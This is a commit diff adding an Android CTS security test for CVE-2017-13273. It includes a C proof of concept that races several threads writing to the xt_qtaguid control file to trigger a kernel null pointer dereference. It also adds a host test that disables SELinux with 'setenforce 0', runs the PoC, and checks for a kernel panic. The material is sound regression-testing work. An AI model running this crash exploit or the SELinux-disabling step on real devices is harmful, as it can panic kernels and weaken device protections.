CTS test for Android Security b/65853158 b/72396737

Test: successful run of newly introduced CTS test case.
Bug: 65853158
Bug: 72396737

Change-Id: Ic6da1bfe405d8a4e3f2e89364b354e376aa5bd5a
Signed-off-by: JSinha <jimmi.sinha@harman.corp-partner.google.com>
(cherry picked from commit a7e3f29dd12724d2f7f3215db1c5fb28016a7794)
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index f881e64..9a54760 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -146,6 +146,7 @@
         <!--__________________-->
         <!-- Bulletin 2018-02 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
         <option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
 
         <!--__________________-->
diff --git a/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk
new file mode 100644
index 0000000..1cb7357
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk
@@ -0,0 +1,31 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-13273
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c b/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c
new file mode 100644
index 0000000..0856392
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c
@@ -0,0 +1,136 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define MAX_THREAD 6
+
+int ctrl_fd;
+static int cmd;
+static int status[MAX_THREAD];
+static int sock_fd;
+
+void *thread_entry(void *arg) {
+  int index, len = 256, ret;
+  char buf[256];
+  index = (int)(unsigned long)arg;
+  memset(buf, 0x0, 256);
+  status[index] = 1;
+
+  // cmd =-1 signifies error in thread creation
+  while (cmd != 1 && cmd != -1) {
+    usleep(5);
+  }
+
+  if (cmd != -1) {
+    switch (index % 3) {
+      case 0:
+        len = sprintf(buf, "d %lu", (unsigned long)0);
+        break;
+      case 2:
+        len = sprintf(buf, "t %d", sock_fd);
+        break;
+    }
+
+    ret = write(ctrl_fd, buf, len);
+  }
+
+  status[index] = 2;
+  return NULL;
+}
+/*
+ *This PoC creates multiple threads to write /proc/net/xt_qtaguid/ctrl device
+ *which causes null pointer derefrences in netstat.
+ */
+int main() {
+  int fd, retry = 1024;
+  int ret, i, loop;
+  pthread_t tid[MAX_THREAD];
+
+  fork();
+  sock_fd = socket(AF_INET, SOCK_STREAM, 0);
+  while (retry--) {
+    cmd = 0;
+    for (i = 0; i < MAX_THREAD; i++) {
+      status[i] = 0;
+    }
+
+    fd = open("/dev/xt_qtaguid", O_RDONLY);
+    if (fd < 0) {
+      return -1;
+    }
+
+    ctrl_fd = open("/proc/net/xt_qtaguid/ctrl", O_RDWR);
+    if (ctrl_fd < 0) {
+      return -1;
+    }
+
+    for (i = 0; i < MAX_THREAD; i++) {
+      ret =
+          pthread_create(&tid[i], NULL, thread_entry, (void *)(unsigned long)i);
+      if (ret != 0) {
+        cmd = -1;
+        close(ctrl_fd);
+      }
+    }
+
+    loop = 1;
+    int count = 0;
+    // loop until all threads have status == 1
+    while (loop) {
+      loop = 0;
+      count = count + 1;
+      for (i = 0; i < MAX_THREAD; i++)
+        if (status[i] != 1) {
+          loop = 1;
+          break;
+        }
+
+      if (loop) {
+        usleep(5);
+      }
+    }
+
+    cmd = 1;
+    loop = 1;
+    while (loop) {
+      loop = 0;
+      count = count + 1;
+      for (i = 0; i < MAX_THREAD; i++)
+        if (status[i] != 2) {
+          loop = 1;
+          break;
+        }
+
+      if (loop) {
+        usleep(5);
+      }
+    }
+    close(fd);
+  }
+  return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc18_02.java b/hostsidetests/security/src/android/security/cts/Poc18_02.java
index 1d6c60d..a0fd9c1 100644
--- a/hostsidetests/security/src/android/security/cts/Poc18_02.java
+++ b/hostsidetests/security/src/android/security/cts/Poc18_02.java
@@ -33,4 +33,23 @@
                                  "invalid attributes: usage=.{1,} content=.{1,} "+
                                  "flags=.{1,} tags=\\[.{256,}\\].*", logcatOutput);
      }
+
+    /**
+     *  b/65853158
+     */
+    @SecurityTest
+    public void testPocCVE_2017_13273() throws Exception {
+        AdbUtils.runCommandLine("dmesg -c" ,getDevice());
+        AdbUtils.runCommandLine("setenforce 0",getDevice());
+        if(containsDriver(getDevice(), "/dev/xt_qtaguid") &&
+           containsDriver(getDevice(), "/proc/net/xt_qtaguid/ctrl")) {
+            AdbUtils.runPoc("CVE-2017-13273", getDevice(), 60);
+            String dmesgOut = AdbUtils.runCommandLine("cat /sys/fs/pstore/console-ramoops",
+                              getDevice());
+            assertNotMatches("[\\s\\n\\S]*CVE-2017-132736 Tainted:" + "[\\s\\n\\S]*" +
+                 "Kernel panic - not syncing: Fatal exception in interrupt", dmesgOut);
+        }
+        AdbUtils.runCommandLine("setenforce 1",getDevice());
+    }
 }
+